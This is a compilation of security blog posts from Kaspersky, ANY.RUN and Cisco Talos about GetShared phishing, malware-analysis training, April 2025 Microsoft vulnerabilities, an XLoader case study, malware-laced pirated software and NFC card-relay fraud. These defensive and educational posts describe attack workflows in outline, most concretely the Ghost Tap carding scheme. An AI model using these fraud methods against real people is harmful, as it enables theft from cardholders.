GetShared phishing | Kaspersky official blog

A former colleague of ours recently received a suspicious email notification from GetShared — a genuine service he was unfamiliar with. Being the paranoid cautious type that he is (he did work at Kaspersky, after all), he didn’t click the link but instead forwarded the notification straight to us. A closer look at the email message confirmed it was a scam. Indeed, our email security statistics suggest that GetShared has been gaining popularity with scammers. We explain how GetShared is used in attacks, why attackers use it, and how to stay safe.

What a GetShared attack looks like

The victim receives a normal, authentic email notification from GetShared informing them that someone has sent them a file. The message specifies the file name and extension. For example, in the attack targeting our ex-colleague’s employer, it was “DESIGN LOGO.rar”.

Email notification from GetShared

Sample scam email sent as a GetShared notification

The message that accompanies the link employs a classic phishing trick: scammers inquire about prices for items supposedly listed in the attachment. To add a veneer of legitimacy, they ask about delivery time and payment details.

Why malicious actors use GetShared and other third-party services

Security solutions filter out the vast majority of spam, phishing, scam emails, and malicious attachments at the email gateway level. A popular and effective tactic for scammers trying to bypass these defenses is to send emails through legitimate services like Google Calendar or Dropbox. These services, naturally, are uncomfortable being unwitting accomplices in cybercrimes, so they constantly improve their own countermeasures, tighten signup rules, and so on. Therefore, scammers keep looking for new services to exploit. GetShared — a free service for sending large files — turned out to be yet another exploitable tool.

Signs that something’s phishy

Let’s step back from this specific case and GetShared for a moment. Ask yourself: is it really normal practice to send a business inquiry as a note in some random third-party file-sharing service? Assuming a hypothetical client has a genuine business need to transmit a file — say, documents relating to an order — via an external service, they’d typically arrange it first through standard email correspondence before sending you a barrage of notifications. This is business etiquette 101.

When someone asks you to view a text document on a third-party service, there can only be three explanations:

  • A security engine flags the document as spam, phishing, or scam.
  • The document contains links to a scam, phishing, or malicious website.
  • The document is infected, or the attachment is actually a malicious executable rather than a document.

In this particular instance, the service was used to distribute a text file containing a rather absurd request to get in touch with the malicious actors — they were trying to start a conversation to then develop the attack through social engineering.

Coming back to the email campaign we observed, this notification looks especially suspicious, primarily due to the glaring mismatch between the name of the file and the text accompanying it. The message hints at some list of goods, whereas the filename strongly suggests a design project.

Furthermore, take a close look at the sender’s address, which is stated clearly in the notification. A quick search for the domain name immediately reveals that this email address is likely used by scammers.

How to defend against such attacks

To protect your company from scam emails sent through GetShared or any other legitimate services, we recommend the following:

Kaspersky official blog – ​Read More

Why Practice Is Key to Training Top Malware Analysts and How ANY.RUN Supports It

While developing our Security Training Lab educational program, we at ANY.RUN have turned to well-established theories of education, cognitive skill development, and the psychology of learning. Their foundational principles emphasize one critical truth: practice is indispensable for mastering complex skills.  

In the field of cybersecurity—especially in malware analysis—the ability to apply theoretical knowledge in real-world scenarios is what separates competent professionals from novices. Inspired by this understanding, we designed the Security Training Lab to bridge the gap between classroom theory and the practical demands of the cybersecurity industry. Students, we believe, are to be equipped to tackle real threats from day one. 

As a malware analysis solutions developer, ANY.RUN has all the resources and capabilities to provide the audience of its educational program with as much practice as it’s ready to digest.  

How Security Training Lab Offers Practice-Oriented Training 

Of course, nobody is going to toss future malware analysts in at the deep end unprepared and watch them flounder in a lake of real cyber threats. Security Training Lab is based on 30 hours of academic content including texts and video lectures.

The program includes modules on:

  • Advanced static and dynamic malware analysis
  • Study of malware behavior, malicious scripts, files, and macros
  • The basics of encryption  
The Program’s structure and contents 

Interactive tasks and tests appear at the end of each module and in the final exam. But real-world examples of detonated, dissected, and analyzed malware run through the entirety of learning material encouraging trainees to find an example or perform a task of their own, to practice their newly acquired skills.

Reach out to our experts to integrate
ANY.RUN’s Security Training Lab in your university 



Contact us


How Security Training Lab Benefits Universities

The emphasis on applicable knowledge and practical experience are not the only features of the Security Training Lab valuable for educational organizations. As a ready-made, expert-supported solution, it offers universities the following benefits:  

  • No setup hassle: full access to ANY.RUN’s Interactive Sandbox for instructors and students. The course is available and ready for use on the Seturon platform. There is no need to set up complex environments or worry about local security.
  • Up-to-date: based on the latest malware samples, techniques, and real-world scenarios, keeping the curriculum relevant. 
  • Scalable for classrooms and remote learners: supports self-paced, instructor-led, and hybrid learning formats. 
  • Built-in analytics: instructors can track progress and assess students’ practical skills. 

The Key to Effective Learning: Interactive Sandbox 

Students don’t just read about malicious scripts, ransomware, or phishing kits—they dissect them. Through ANY.RUN’s Interactive Sandbox, they gain full access to a virtualized environment where they can upload, execute, and analyze live threats. 

Public reports with malware samples submitted by ANY.RUN’s users

They also gain access to a repository of malware samples submitted by ANY.RUN’s user community of more than 500,000 cybersecurity professionals. These users (including 15,000 corporate SOC teams that face the most current and dangerous threats) leave public reports on their analysis sessions that students can explore and analyze of their own.

A task for working with public reports

All students of the Security Training Lab have an unlimited access to the Sandbox, so they can go far beyond examples and tasks in the program. 

Launching a suspected malware sample analysis in sandbox’s virtual environment

For example, a student might analyze a phishing link disguised as a legitimate URL, interact with it in the sandbox, and observe how it attempts to steal credentials or deploy secondary malware. Another might de-obfuscate a malicious script, uncovering its hidden payload step-by-step.

Investigating a suspicious link in ANY.RUN’s Sandbox 

These exercises simulate the real-life scenarios analysts face — whether it’s investigating a targeted attack on a corporate network or responding to a widespread malware campaign. By engaging with authentic samples, students learn to recognize patterns, anticipate attacker tactics, and develop effective mitigation strategies. 


Learn more about Security Training Lab

Learn more about Security Training Lab

Discover the key benefits of integrating Security Training Lab for both students and universities



A Dive into Practice: Full Scope of Tools 

Of course, the hands-on part of the Security Training Lab curriculum is not based solely on ANY.RUN’s tools.

A number of modules introduce students to key professional tools

A malware analysis expert is to employ an arsenal of instruments, so it’s vital for the students to start acquainting with them early and intensely.

Conclusion  

The cybersecurity industry is experiencing a global talent shortage, particularly in skilled threat researchers and malware analysts. With the Security Training Lab, we help to address this gap by providing a practice-first, job-relevant learning experience. 

Through hands-on training with real malware samples and simulations of workplace challenges, we’re preparing students not just to understand cyber threats, but to defeat them.  

By integrating ANY.RUN’s course into the academic program, universities meet the challenges of offering a competitive educational product, answering to the market urges, and providing their students with the most promising career opportunities.  

For Universities: Contact ANY.RUN to integrate Security Training Lab in your curriculum 

About ANY.RUN

ANY.RUN supports over 15,000 organizations across numerous industries, including banking, manufacturing, and healthcare. Our interactive malware analysis and threat intelligence tools allow companies and SOC teams to speed up their threat investigations, ensure proactive security, and build stronger and more resilient operations.

The post Why Practice Is Key to Training Top Malware Analysts and How ANY.RUN Supports It appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Microsoft Patch Tuesday for April 2025 — Snort rules and prominent vulnerabilities

Microsoft Patch Tuesday for April 2025 — Snort rules and prominent vulnerabilities

Microsoft has released its monthly security update for April of 2025 which includes 126 vulnerabilities affecting a range of products, including 11 that Microsoft marked as “critical”. 

In this month’s release, none of the included vulnerabilities have been observed by Microsoft to be exploited in the wild. The eleven “critical” entries are all remote code execution (RCE) vulnerabilities, four of which have been marked as “Exploitation more likely”. 

Two of the “critical” vulnerabilities listed affect components of the Windows Remote Desktop Services. 

CVE-2025-27480 and CVE-2025-27482 are RCE vulnerabilities in components of the Remote Desktop Gateway Service. Both vulnerabilities were given a CVSS 3.1 score of 8.1. To successfully exploit these an attacker could connect to a system with the Remote Desktop Gateway role and trigger a race condition to create a use-after-free scenario, potentially allowing arbitrary code to be executed. Microsoft has assessed that the attack complexity is “high”, and exploitation is “More likely”.

CVE-2025-26663 is an RCE vulnerability in the Windows Lightweight Directory Access Protocol (LDAP) and has been given a CVSS 3.1 score of 8.1. This could be exploited by an attacker by sending a specially crafted LDAP call to trigger a use-after-free vulnerability, allowing arbitrary code to be executed in the context of the LDAP service. An attacker could initiate this by sending a victim an email or message containing a malicious link. Microsoft has assessed that exploitation is “more likely” and that the attack complexity is “high”.

CVE-2025-26670 is a RCE vulnerability in the Lightweight Directory Access Protocol (LDAP) Client and has been given a CVSS 3.1 base score of 8.1. An attacker could exploit this vulnerability by sending sequential specially crafted LDAP requests to a vulnerable LDAP server. Successful exploitation would require an attacker to win a race condition, which could result in a use-after-free that would allow for arbitrary code execution. Microsoft states that exploitation of this vulnerability is “More likely” and that the attack complexity is “high”.

CVE-2025-26686 is an RCE vulnerability in Windows TCP/IP and has been given a CVSS 3.1 base score of 7.5. Due to improperly locked memory in Windows TCP/IP, this vulnerability could allow an attacker to execute arbitrary code over a network. To exploit this an attacker must wait for a user to initiate a connection and send a DHCPv6, to which the attacker would reply with a DHCPv6 response containing a fake IPv6 address. Successful exploitation requires the attacker to win a race condition and make several preparations in the target environment beforehand. Due to this complexity Microsoft has determined that exploitation is “Less likely”.

CVE-2025-27491 is an RCE vulnerability in Windows Hyper-V and has a CVSS 3.1 base score of 7.1. An attacker with guest privileges on a network could exploit this by convincing a victim to click a link to a malicious site.  Microsoft has determined that exploitation of this vulnerability is “Less likely” and that the attack complexity is “high”.

CVE-2025-29791 is an RCE vulnerability in Microsoft Excel and has a CVSS 3.1 base score of 7.8. An attacker could exploit this by sending a specially crafted document to a victim that triggers a type confusion when opened. Once triggered, the type confusion could lead to arbitrary code execution. Microsoft has assessed that exploitation of this vulnerability is “Less likely”.

CVE-2025-27752 is another RCE vulnerability in Microsoft Excel and has a CVSS 3.1 score of 7.8. This is a heap overflow vulnerability and can be exploited by an attacker to locally execute arbitrary code. It has been assessed that exploitation of this vulnerability is considered “Less likely”.

CVE-2025-27745, CVE-2025-27748 and CVE-2025-27749 are RCE vulnerabilities in Microsoft Office and all have a CVSS 3.1 base score of 7.8. These could be exploited by an attacker by triggering a use-after-free scenario, allowing for the execution of arbitrary code. Microsoft has determined that exploitation for each is considered “Less likely”.

Talos would also like to highlight the following “important” vulnerabilities as Microsoft has determined that exploitation is “More likely”:

  • CVE-2025-27472 – Windows Mark of the Web Security Feature Bypass Vulnerability
  • CVE-2025-27727 – Windows Installer Elevation of Privilege Vulnerability
  • CVE-2025-29792 – Microsoft Office Elevation of Privilege Vulnerability
  • CVE-2025-29793 – Microsoft SharePoint Remote Code Execution Vulnerability
  • CVE-2025-29794 – Microsoft SharePoint Remote Code Execution Vulnerability
  • CVE-2025-29809 – Windows Kerberos Security Feature Bypass Vulnerability
  • CVE-2025-29812 – DirectX Graphics Kernel Elevation of Privilege Vulnerability
  • CVE-2025-29822 – Microsoft OneNote Security Feature Bypass Vulnerability 

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 58316, 58317, 64432, 64746 – 64757, 64760 – 64762. There are also these Snort 3 rules: 301176 – 301179.

Cisco Talos Blog – ​Read More

How MSSP Expertware Uses ANY.RUN’s Interactive Sandbox for Faster Threat Analysis

At ANY.RUN, we love hearing about clients’ experiences. Quality feedback helps us improve and gives new and existing users a clearer understanding of our tools in actual security scenarios. 

That’s why when we spoke with Augustin Alexandrovici, who leads Cyber Intelligence Operations at Expertware, we knew we had to share our conversation.  

Check out the highlights to see how a Managed Security Service Provider employs ANY.RUN in its operations. 

Company Overview 

Expertware is a leading IT consultancy with over 18 years of experience, specializing in cybersecurity and Security Operations Center (SOC) services. With a dedicated team of over 30 cyber experts, we can seamlessly build or extend internal teams to address evolving threats and ensure robust protection for businesses. 

Our expertise spans AI and machine learning, full-stack development, IT architecture, and business optimization. Having completed over 500 successful projects for leading European clients across industries such as banking, insurance, retail, telecom, and more, we deliver innovative, high-impact solutions that foster growth and resilience. 

What Made Expertware Look for a Malware Sandbox 

We started looking for a sandbox, because we wanted to offer to our customers an in-depth view of security incidents targeting their IT Infrastructure. 

Before, we had to manually set up reverse-engineering environments, which was a time-consuming process. The extra steps required slowed down our ability to analyze and respond to malware threats in an efficient way. 

We also wanted to improve the average turnaround time for malware investigations to make operations faster and be able to process more threats.  

Another challenge we sought to address was the limited visibility into attacks. We needed a solution that would present us with an intuitive and streamlined view of threats’ entire kill chain. 

With all of these taken into consideration, ANY.RUN’s sandbox became our choice. 

ANY.RUN has enabled us to actually interact with malicious files on the fly, which saves us from risky manual setups and cuts down on the resources we allocate to daily tasks

One of the main factors behind our decision was the interactivity. It instantly solved the problem of building and maintaining our custom VMs for malware analysis. ANY.RUN has enabled us to actually interact with malicious files on the fly, which saves us from risky manual setups and cuts down on the resources we allocate to daily tasks. 

How Expertware Use ANY.RUN 

Our organization has been using ANY.RUN for over a year. Initially, we started with a proof of concept (POC) phase to see how it would fit into our SOC workflow, and we found it very effective, so we fully integrated it soon afterwards. 

Now we use all the core products provided by ANY.RUN: the Interactive Sandbox, TI Feeds, and Threat Intelligence Lookup complementing and enriching our SIEMBIOT cyber security. Our team relies on them for malware analysis, dynamic execution of files, and rapid threat intelligence analysis. 

We use the sandbox specifically for: 

  • Malware Investigations: We submit suspicious files for dynamic analysis to observe malicious behavior, network indicators, and potential dropper actions. 
  • Phishing Analysis: We examine advanced phishing campaigns to see how attachments or malicious scripts are executed within a controlled environment. 
  • Indicator Extraction and Mapping: We extract IOCs, map the full scope of the attack to the MITRE ATT&CK framework, and quickly integrate them into our threat intelligence feeds and detection systems. 
  • Training & Collaboration: We share interactive reports across the SOC and Incident Response teams to facilitate collaborative analysis and help junior analysts develop their skills. 

Reach out to our experts
to integrate ANY.RUN’s products in your organization 



Contact us


Examples of Cyber Threats ANY.RUN Helps Address 

At Expertware, we routinely confront threats like advanced infostealers (e.g., RedLine, Raccoon Stealer), persistent backdoors (like NanoCore or Remcos), and botnet malware (such as Emotet). ANY.RUN’s Interactive Sandbox and real-time analysis tools are invaluable in helping us quickly detect, investigate, and neutralize these evolving threats. 

Notable Use Case: XLoader Phishing Attack 

One notable case involved a highly obfuscated phishing campaign distributing XLoader malware in a multi-stage infection chain. Initially, the malicious attachment was a seemingly benign Microsoft Office document containing VBA macros. Once the macro was enabled, it executed a PowerShell command that retrieved additional payloads from a remote server.

This was followed by fileless techniques, such as reflective loading of DLLs directly into memory, making static detection difficult. When we ran the sample in ANY.RUN’s Interactive Sandbox, we could manually walk through each stage of the infection process. Specifically: 

  1. Macro Execution: We triggered the VBA macro inside the sandbox, capturing real-time logs of spawned processes (e.g., powershell.exe) and network connections. 
  1. Decoding the PowerShell Script: The script was obfuscated using string concatenation and base64 encoding. ANY.RUN’s interactive approach lets us step through and decode the script in real time, exposing the URLs used for Command & Control. 
  1. Memory Analysis: By pausing and resuming processes, we pinpointed the exact moment the additional payload was written directly to memory. This was crucial in revealing the second-stage DLL that XLoader injected, bypassing traditional on-disk detection. 
  1. Network Traffic Inspection: We observed the malware connecting to its C2 infrastructure, sending beacon requests with system reconnaissance data. ANY.RUN’s detailed packet capture allowed us to extract and analyze these indicators (e.g., domain names, IP addresses, and request parameters). 
  1. Persistence Mechanisms: XLoader used several registry-based techniques to maintain persistence. We tracked registry changes within the sandbox session, which helped us craft custom detection rules in our SIEM and endpoint solutions. 

Without the ability to dynamically interact with the malware (e.g., clicking through the macros, responding to execution prompts, and examining in-memory behavior), many of these steps would have remained hidden, especially given the extensive use of fileless and obfuscation techniques. ANY.RUN gave us the granularity to uncover each stage, correlate events, and produce comprehensive IOCs to better protect our environment and inform our incident response. 

In short, ANY.RUN’s interactive approach was critical in dissecting this complex multi-stage XLoader campaign and swiftly mitigating its impact across our network. 

Security and Operational Improvements After Adopting ANY.RUN 

With ANY.RUN, our malware investigation and IOC extraction processes have seen over a 50% reduction in turnaround time.  

The time saved in malware investigations means threats are contained and remediated faster, right? So, I believe the real added value is the opportunity to reduce potential damage. Which is really the one and only scope of our work. 

With ANY.RUN, our malware investigation and IOC extraction processes have seen over a 50% reduction in turnaround time

Process tree in ANY.RUN showing the execution chain of the Formbook malware 

The visual process tree and network analysis allow us to see an attack’s full scope in one place, which really speeds up our containment and remediation processes. 

ANY.RUN generates analysis reports that can be shared via a link 

Plus, collaborating got easier—everyone’s on the same page when we can share those interactive reports. 

Implementation Challenges and Solutions 

To integrate ANY.RUN into our SIEM and SOAR platforms for real-time data flow, we used APIs and custom scripts, supported by OpenCTI integration. Initial challenges included interoperability issues with our Filigran system, data formatting mismatches, and security constraints. Collaboration with vendors and iterative testing resolved these issues, achieving reliable performance. 

To help colleagues fully utilize ANY.RUN’s interactive features, we conducted in-house training sessions. These covered the platform’s core functionalities, best practices for malware analysis, and real-time collaboration techniques. This ensured all team members, from junior analysts to experienced responders, could effectively use the new workflows and maximize the platform’s capabilities. 


How Transport Company Improved Proactive Threat Intelligence with ANY.RUN

How Transport Company Improved Proactive Threat Intelligence

Discover a first-hand account of how a multinational logistics business integrated ANY.RUN’s Threat Intelligence Lookup to track emerging malware and phishing



Employee Feedback 

Our employees are generally very positive about ANY.RUN’s products. Analysts appreciate the intuitive interface and the ability to manipulate malware in real-time. Junior analysts find it educational, since they can watch suspicious processes unfold step by step, learning about Tactics, Techniques, and Procedures (TTPs) in a hands-on manner. Senior analysts value the time savings and the visual clarity of the results. 

Junior analysts find it educational, since they can watch suspicious processes unfold step by step

Advice for Those Planning to Integrate ANY.RUN 

We advise starting with a pilot project on the most suspicious files—you’ll see the value right away. Take advantage of ANY.RUN’s API documentation and support channels to make integration smoother. And if you’re training new analysts, definitely have them dive into the interactive side of things. It’s a real game-changer. 

Plans 

We’re upping our SOC game by adding more automation. ANY.RUN’s API integration makes it easy to connect with our CTI/SOAR platform, so when something malicious is detected, it can trigger containment steps automatically. ANY.RUN will be a core piece of our future setup. 

Conclusion 

A big thank you to Augustine and Expertware for sharing their insight into the day-to-day operations of a security team during our meeting. The expertise and unique perspectives you provided as part of the interview will help other organizations understand the benefits of integrating ANY.RUN’s Interactive Sandbox for stronger security. 

If you are using ANY.RUN’s products and willing to share your experiences with the community, please send us an email at content@any.run

About ANY.RUN

ANY.RUN supports over 15,000 organizations across industries such as banking, manufacturing, telecommunications, healthcare, retail, and technology, helping them build stronger and more resilient cybersecurity operations.

With our cloud-based Interactive Sandbox, security teams can safely analyze and understand threats targeting Windows, Linux, and Android environments in less than 40 seconds and without the need for complex on-premise systems. Combined with our Threat Intelligence solutions, TI Lookup, YARA Search, and Feeds, we equip businesses to speed up investigations, reduce security risks, and improve team’s efficiency.

The post How MSSP Expertware Uses ANY.RUN’s Interactive Sandbox for Faster Threat Analysis appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Year in Review: Key vulnerabilities, tools, and shifts in attacker email tactics

Year in Review: Key vulnerabilities, tools, and shifts in attacker email tactics

Over the next few weeks, we’re breaking down the most critical sections of our 2024 Year in Review.

This week, we examine the most frequently targeted vulnerabilities—particularly those affecting network infrastructure. We also detail a noticeable shift in adversary behavior, as threat actors move away from time-sensitive lures in phishing campaigns. Finally, we highlight the tools most commonly leveraged by attackers last year and provide guidance on how to detect their presence in your environment.

Download the full report for a deeper understanding of these trends and actionable steps to strengthen your defenses.

Only have 60 seconds? Here’s a roundup for you on this topic:

Cisco Talos Blog – ​Read More

What happens to your computer when you download pirated software | Kaspersky official blog

What do you do when you need a program but can’t buy an official license yet? Correct answer: “Use the trial version” or “Find a free alternative.” Wrong answer: “Search online for a cracked version.”

Sketchy alternative sources are known to offer cracked versions of software, along with other goodies. After wading through sites stuffed with ads, you may get the program you want (usually minus the future updates and network functionality), but with a miner, stealer, or whatever else thrown in for good measure.

Based on real-world examples, we explain why you should avoid sites that offer instant downloads of in-demand programs.

Miner and stealer on SourceForge

SourceForge was once the largest site for all things open source, the forerunner of GitHub. But don’t think that SourceForge is dead – today it provides software hosting and distribution services. Its software portal hosts multiple projects, uploaded by anyone who wants to.

And, as with GitHub, it’s this cosmopolitanism that is a barrier to high-level security. Let’s take just one example: our experts found a project called officepackage on SourceForge. At first glance, it looks harmless: a clear description, no-nonsense name, even a positive review.

“Officepackage” page on SourceForge

But what if we told you that the description and files were copied outright from an unrelated project on GitHub? Alarm bells are already ringing. That said, no malware lands on your computer when you click the Download button – the project is apparently clean. Apparently, because the malicious payload was not distributed directly through the officepackage project, but through the web page associated with it. How is this possible?

The fact is that every project created on SourceForge gets its own domain name and hosting on sourceforge.io. So a project named officepackage is given a web page at officepackage.sourceforge[.]io. Such pages are easily indexed by search engines and rank high in search results. This is how attackers attract victims.

When visiting officepackage.sourceforge[.]io from a search engine brought users to a page offering downloads of almost any version of the Microsoft Office suite. But, as ever, the devil was in the detail: when you hovered over the Download button, the browser’s status bar showed a link to https[:]//loading.sourceforge[.]io/download. Spotted the trap? The new link has nothing to do with officepackage; loading is an entirely different project.

The “Download” button on the “officepackage” page of the SourceForge software portal leads to a completely different project

And after clicking, users were redirected not to the page of the loading project, but to another intermediary site with another Download button. And only after clicking this did the user, weary of surfing, finally receive a file – an archive named vinstaller.zip. Inside was another archive, and inside this second archive was a malicious Windows Installer.

At the heart of this evil nesting doll were two nasties: instead of Microsoft products, a miner and ClipBanker – malware for substituting crypto wallet addresses in the clipboard – were let loose on the victim’s device after running the installer. Details of the infection scheme can be found in the full version of the study on our Securelist blog.

Malicious TookPS installer disguised as legitimate software

Cybercriminals do not limit themselves to SourceForge and GitHub. In another recent case unearthed by our experts, attackers were found distributing the malicious TookPS downloader, already familiar to us from the fake DeepSeek and Grok clients, through fake websites offering free downloads of specialized software. We discovered a whole series of such sites offering users cracked versions of UltraViewer, AutoCAD, SketchUp and other popular professional software, meaning that the attack was not only aimed at home users, but also at professional freelancers and organizations. Other malicious files detected included the names Ableton.exe and QuickenApp.exe, purported versions of the popular music creation and money management applications.

Fake pages distributing TookPS

Fake pages distributing TookPS

By circuitous means, the installer downloaded two backdoors to the victim’s device: Backdoor.Win32.TeviRat and Backdoor.Win32.Lapmon. See another Securelist post to find out exactly how the malware was delivered to the victim’s device. The malware gave the attackers full access to the victim’s computer.

How to protect yourself

First, do not download pirated software. Under any circumstances. Ever. A cracked program may be temptingly free and instantly available, but the price you pay will be measured not in money, but in data – your data. And no, that doesn’t mean family photos and chats with friends. Cybercriminals are after your crypto wallets, payment card details, account passwords – and even your computer’s resources for cryptocurrency mining.

Here’s a list of rules we recommend for anyone who uses SourceForge, GitHub and other software portals.

  • If you can’t buy the full version of an application, use alternatives or trial versions, not cracked software. You might not get the full functionality, but at least your device is guaranteed to be safe.
  • Only download programs from trusted sources. As SourceForge and GitHub practice shows, even then you should proceed with caution and scan all downloaded files with an antivirus.
  • Protect your cryptocurrency and banking data with reliable tools. Treat virtual wallets with the same reverence as physical ones.

Further reading in support of not downloading pirated software:

Kaspersky official blog – ​Read More

Year in Review: In conversation with the report’s authors

Year in Review: In conversation with the report's authors

🎥 Talos Year in Review 2024: Part 1 & 2 – Watch Now!

Another year, another mountain of malicious telemetry to sift through. I spoke with a few of Talos’ Year in Review authors, freshly out of the sandbox, to discuss the how’s and why’s of our biggest findings.

👉 Part 1: The major theme of 2024, top vulnerabilities, email threats and adversary tooling

👉 Part 2: Ransomware groups, and why we’re seeing more identity attacks

Whether you’re here for the hard data or the dry humor, we’ve got you covered. We break down what mattered most in 2024 — and what’s on the radar for 2025.

Download Talos’ full 2024 Year in Review today.

Cisco Talos Blog – ​Read More

How to guard against NFC carding theft | Kaspersky official blog

Payment card security is constantly improving, but attackers keep finding new ways to steal money. In days gone by, having tricked the victim into handing over card credentials on a fake online store or through another scam, cybercriminals would make a physical duplicate card by writing the stolen data onto a magnetic stripe. Such cards could then be used in stores and even at ATMs without a hitch. The advent of chip cards and one-time passwords (OTPs) made life much harder for scammers, but they adapted. The shift to mobile payments using smartphones increased resilience against some types of scams — but also opened up new avenues for it. Now, having phished a card number, they try to link it to their own Apple Pay or Google Wallet account. That done, they use this account from a smartphone to pay for goods using the victim’s card — either in a regular store or at a fake outlet with an NFC-enabled payment terminal.

How card credentials are phished

Such cyberattacks entail preparation on an industrial scale. Attackers create networks of fake websites designed to phish for payment data. These might imitate delivery services, large online stores, and even portals for paying utility bills or traffic fines. The cybercriminals also buy up dozens of smartphones, create Apple or Google accounts on them, and install contactless payment apps.

Next comes the juicy bit. When a victim lands on a bait site, they’re asked to link their card or make a mandatory small payment. This requires entering their card details and confirming ownership of the card by entering an OTP. In fact, the card is not charged at this point.

What actually happens? The victim’s data is almost instantly transferred to the cybercriminals, who attempt to link the card to a mobile wallet on their smartphone. The OTP code is needed to authorize this operation. To speed up and simplify the process, the attackers use special software that takes the data supplied by the victim and generates an image of the card that replicates it perfectly. After that, it’s enough just to take a photo of this image from Apple Pay or Google Wallet. The exact process of linking a card to a mobile wallet depends on the specific country and bank, but usually, no data is required other than the number, expiration date, cardholder name, CVV/CVC, and OTP. All this can be phished in a single session and put to use immediately.

To make attacks even more effective, cybercriminals employ additional tricks. First, if the victim comes to their senses before tapping the Submit button, any data already entered into the forms is still passed to the criminals — even if it’s just a few characters or an incomplete entry. Second, the fake site may report that the payment failed and prompt the victim to try a different card. This way, the criminals might phish details for two or three cards in one go.

The cards aren’t charged right away, and many people, seeing nothing suspicious on their bank statement, forget all about the incident.

How money is stolen from cards

Cybercriminals might link dozens of cards to one smartphone without immediately trying to spend money from them. This smartphone, stuffed with card numbers, is then resold on the dark web. Often, weeks or even months go by between the phishing and the spending. But when that unpleasant day eventually comes, the criminals might decide to splash out on luxury items in a physical store simply by making a contactless payment from a phone full of phished card numbers. Alternatively, they might set up their own fake store on a legitimate e-commerce platform and charge money for non-existent goods. Some countries even allow ATM withdrawals using an NFC-enabled smartphone. In all of the above cases, no confirmation of the transaction via PIN or OTP is required, so money can be siphoned off until the victim blocks the card.

To speed up transferring mobile wallets to clandestine buyers, as well as to reduce the risk for those making payments in stores, attackers have begun to use an NFC relay technique dubbed Ghost Tap. They start by installing a legitimate app such as NFCGate on two smartphones — one with the mobile wallet and stolen cards, the other used directly for payments. This app transmits, in real time over the internet, the NFC data of the wallet from the first phone to the NFC antenna of the second, which the cybercriminals’ accomplice (known as a “mule”) taps on the payment terminal.

Most terminals in offline stores and many ATMs are unable to tell the relayed signal from an original one, allowing the mule to easily pay for goods (or gift cards, which make it easier to launder the stolen funds). And if the mule is detained in the store, there is nothing incriminating on the smartphone, only the legitimate NFCGate app. No stolen card numbers are there, for these are tucked away on the smartphone of the mastermind behind the operation, who can be anywhere, even in another country. This method allows scammers to quickly and safely cash out large sums because there can be multiple mules paying almost simultaneously with the same stolen card.

How to lose money by tapping your card on your phone

In late 2024, fraudsters came up with another NFC relay scheme and successfully tested it on users from Russia, and there’s nothing to stop the operation from being scaled up worldwide. In this scheme, victims aren’t even asked for their card credentials. Instead, the attackers socially engineer them into installing a supposedly handy app on their smartphone under the guise of a government, banking, or other service. Since many such banking and government apps in Russia were removed from official stores due to sanctions, unsuspecting users readily agree to install them. The victim is then prompted to hold their card to their smartphone and enter their PIN for “authorization” or “verification” purposes.

As you might have guessed, the installed app has nothing in common with its description. In the first wave of such attacks, what victims received was the same NFC relay, repackaged as a “handy app”. It read the card when held to the smartphone, and transmitted its data along with the PIN to the attackers, who used it to make purchases or withdraw cash from NFC-enabled ATMs. Anti-fraud systems of major Russian banks quickly learned to identify such payments due to mismatches in the victim’s and the payer’s geolocation, so in 2025 the scheme — but not the essence — changed.

Now, the victim receives an app for creating a duplicate card, and the relay is installed on the attackers’ side. Next, under the bogus pretext of the risk of theft, the victim is persuaded to deposit money into a “safe account” through an ATM, using their smartphone to authorize the payment. When the victim holds their phone to the ATM, the scammer relays their own card details to it, and the money ends up in their account. Such operations are hard to track for automatic anti-fraud systems since the transaction looks perfectly legitimate — someone walked up to an ATM and deposited cash onto a card. The anti-fraud system doesn’t know that the card belonged to someone else.

How to protect your cards from scammers

First of all, Google and Apple themselves, together with payment systems, should implement additional protective measures in the payment infrastructure. However, users can also take steps to protect themselves:

  • Use virtual cards for online payments. Don’t keep large amounts of money on them, and only top up just before making an online purchase. If your card issuer allows it, disable offline payments and cash withdrawals from such cards.
  • Get a new virtual card and block your old one at least once a year.
  • For offline payments, link a different card to Apple Pay, Google Wallet, or a similar service. Never use this card online, and if possible, use a mobile wallet on your smartphone when paying in stores.
  • Be very wary of apps asking you to hold your payment card to your smartphone, never mind enter your PIN. If it’s a long-trusted banking app, then okay; but if it’s something dodgy you only just installed from an obscure link outside an official app store, then stay clear.
  • Use plastic cards at ATMs, not an NFC-enabled smartphone.
  • Install a comprehensive security solution on all computers and smartphones to minimize the risk of landing on phishing sites and installing malicious apps.
  • Enable the Safe Money component, available in all our security solutions, to protect financial transactions and online purchases.
  • Activate the fastest possible transaction notifications (text and push) for all payment cards, and contact your bank or issuer immediately if you notice anything suspicious.

Want to learn more about how scammers can steal money from your cards? Read our posts:

Kaspersky official blog – ​Read More

One mighty fine-looking report

One mighty fine-looking report

Welcome to this week’s edition of the Threat Source newsletter. 

They say art is subjective, but have you ever seen a well-formatted bar chart? Van Gogh had Starry Night, but Talos’ 2024 Year in Review (available now!) has color-coded data with perfect labels. True beauty. 

If you haven’t yet had a chance to fully digest this gorgeous report (massive shout-out to our creative team), here are some links. Clicking on them may not change your life, but what if it does? Only one way to find out: 

Our Year in Review landing page houses all our Year in Review content, from videos to podcasts and topic summaries. There’s more content coming out every week this month. Oh, you can also download the report itself here, which is useful. 

Here’s a two-minute animated overview. Watch those bad boy bar charts come to life. 

The TTP: Year in Review Special (Part 1) is inspired by The Last of Us in more ways than you might think. We have a two-part video interview with the report’s authors, featuring me calling cybercriminals “cheeky f*****s.” Part 2 is coming out tomorrow, April 4th

This Beers with Talos B team episode genuinely caused someone to direct message me, citing their spouse’s concerns about their laughter levels when listening (“Are you okay?”). 

A couple of the report’s top findings: 

  • Ransomware actors overwhelmingly leveraged valid accounts for initial access in 2024, with this tactic appearing in almost 70 percent of Cisco Talos Incident Response cases. 
  • Operators endeavored to disable targets’ security solutions in most of the Talos IR cases we observed, almost always succeeding. 
